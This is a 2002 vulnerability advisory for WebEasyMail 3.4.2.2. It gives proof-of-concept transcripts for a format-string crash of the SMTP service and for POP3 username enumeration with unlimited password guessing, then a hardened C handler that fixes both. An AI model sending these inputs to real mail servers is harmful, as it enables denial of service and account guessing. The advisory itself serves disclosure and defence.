Multiple Vulnerabilities in WebEasyMail for Windows

Reported August 20, 2002, by Stan Bubrouski.

VERSION AFFECTED

· WebEasyMail for Windows 3.4.2.2 and earlier versions

 

DESCRIPTION

Two vulnerabilities exist in WebEasyMail for Windows 3.4.2.2 and earlier versions that can result in a Denial of Service (DoS) condition and information disclosure. The DoS condition results when an attacker sends input containing specially crafted format strings, such as those interpreted by the “printf” family of functions, causing the service to terminate without an error message. The information disclosure vulnerability lets an attacker obtain a valid username and password on the vulnerable system. By default, an attacker can make unlimited logon attempts without the server terminating the connection. If the attacker gives a wrong password, the server responds with "-ERR invalid username" if the user doesn't exist and with "-ERR wrong password for this user" if the user exists. The differing replies distinguish existing accounts from nonexistent ones, and the unlimited attempts leave password guessing unchecked.

 

DEMONSTRATION

The discoverer posted the following scenarios as proof-of-concept:

For the DoS condition:

$ nc localhost 25

220 ESMTP on WebEasyMail [3.4.2.2] ready.  http://www.winwebmail.com

%2

502 Error: command not implemented

%2s

502 Error: command not implemented

%100s

502 Error: command not implemented

%3000s

[emsrv.exe silently dies here]

$

For the information disclosure vulnerability:

OK POP3 on WebEasyMail [3.4.2.2] ready.  http://www.winwebmail.com

user dog

+OK user accepted

pass dog

-ERR invalid username

user test

+OK user accepted

pass dog

-ERR wrong password for this user
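
A hardened handler for the behaviour shown in the two transcripts above, added here as an example and not taken from the vendor or the discoverer: client text is only ever passed as data to a fixed format string, both login failure cases get one identical reply, and the session is dropped after a fixed number of failures. The names pop3_line and MAX_FAILS, the account table, the limit of 3 and the reply wording are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>

#define MAX_FAILS 3   /* assumed policy: drop the session after 3 bad logins */

/* Constructed account table (plaintext only to keep the example short). */
static const char *USERS[][2] = { { "test", "s3cret" } };

struct session { char user[64]; int fails; int closed; };

/* Handle one client line and write the reply to out. Returns 1 on login. */
int pop3_line(struct session *s, const char *line, char *out, size_t n) {
    char arg[64];
    size_t i;
    if (s->closed) { snprintf(out, n, "-ERR connection closed\r\n"); return 0; }
    if (sscanf(line, "user %63s", arg) == 1) {
        /* Same answer whether or not the account exists. */
        snprintf(s->user, sizeof s->user, "%s", arg);
        snprintf(out, n, "+OK user accepted\r\n");
        return 0;
    }
    if (sscanf(line, "pass %63s", arg) == 1) {
        for (i = 0; i < sizeof USERS / sizeof USERS[0]; i++)
            if (!strcmp(s->user, USERS[i][0]) && !strcmp(arg, USERS[i][1])) {
                snprintf(out, n, "+OK logged in\r\n");
                return 1;
            }
        /* One message for both "no such user" and "wrong password". */
        if (++s->fails >= MAX_FAILS) s->closed = 1;
        snprintf(out, n, "-ERR authentication failed\r\n");
        return 0;
    }
    /* Client text is an argument to a fixed format, never the format itself. */
    snprintf(out, n, "-ERR unknown command: %.32s\r\n", line);
    return 0;
}

int main(void) {
    struct session s = {0};
    char out[128];
    const char *lines[] = { "%3000s", "user dog", "pass dog", "user test", "pass dog" };
    size_t i;
    for (i = 0; i < sizeof lines / sizeof lines[0]; i++) {
        pop3_line(&s, lines[i], out, sizeof out);
        printf("C: %s\nS: %s", lines[i], out);
    }
    return 0;
}
```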

 

VENDOR RESPONSE

The vendor, WebEasyMail, has been notified, but has not yet released a patch for this vulnerability.

 

CREDIT
Discovered by Stan Bubrouski.
